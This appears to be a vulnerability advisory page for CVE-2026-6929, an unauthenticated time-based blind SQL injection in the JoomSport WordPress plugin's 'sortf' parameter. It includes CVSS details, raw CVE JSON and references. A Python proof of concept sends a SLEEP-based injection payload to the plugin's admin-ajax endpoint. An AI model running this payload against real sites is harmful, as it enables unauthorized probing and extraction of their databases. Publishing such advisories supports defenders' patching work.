Security Vulnerability Report
δΈ­ζ–‡
CVE-2026-6929 CVSS 7.5 HIGH

CVE-2026-6929

Published: 2026-05-13 06:16:15
Last Modified: 2026-05-13 14:43:47

Description

The JoomSport – for Sports: Team & League, Football, Hockey & more plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'sortf' parameter in all versions up to, and including, 5.7.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

JoomSport <= 5.7.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time def check_sqli(url): """ Proof of Concept for Time-Based Blind SQL Injection in JoomSport plugin. Target parameter: 'sortf' """ # Payload based on the vulnerability description # If the database sleeps, the condition is likely true payload = { 'sortf': '1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)' } try: print(f"[+] Sending payload to {url}...") start_time = time.time() response = requests.get(url, params=payload, timeout=10) end_time = time.time() elapsed = end_time - start_time if elapsed >= 5: print(f"[!] Vulnerability confirmed! Response took {elapsed:.2f} seconds.") else: print(f"[-] Not vulnerable or patched. Response took {elapsed:.2f} seconds.") except requests.RequestException as e: print(f"[Error] Request failed: {e}") if __name__ == "__main__": # Replace with the actual vulnerable endpoint URL target_url = "http://example.com/wp-admin/admin-ajax.php?action=joomsport_playerlist" check_sqli(target_url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6929", "sourceIdentifier": "[email protected]", "published": "2026-05-13T06:16:14.943", "lastModified": "2026-05-13T14:43:46.717", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The JoomSport – for Sports: Team & League, Football, Hockey & more plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'sortf' parameter in all versions up to, and including, 5.7.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/joomsport-sports-league-results-management/tags/5.7.5/sportleague/base/wordpress/classes/class-jsport-getplayers.php#L153", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/joomsport-sports-league-results-management/tags/5.7.5/sportleague/classes/objects/class-jsport-playerlist.php#L80", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/joomsport-sports-league-results-management/trunk/sportleague/base/wordpress/classes/class-jsport-getplayers.php#L153", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/joomsport-sports-league-results-management/trunk/sportleague/classes/objects/class-jsport-playerlist.php#L80", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3516487%40joomsport-sports-league-results-management&new=3516487%40joomsport-sports-league-results-management&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/28b730b3-4260-414f-8a4a-65ba5509449b?source=cve", "source": "[email protected]"}]}}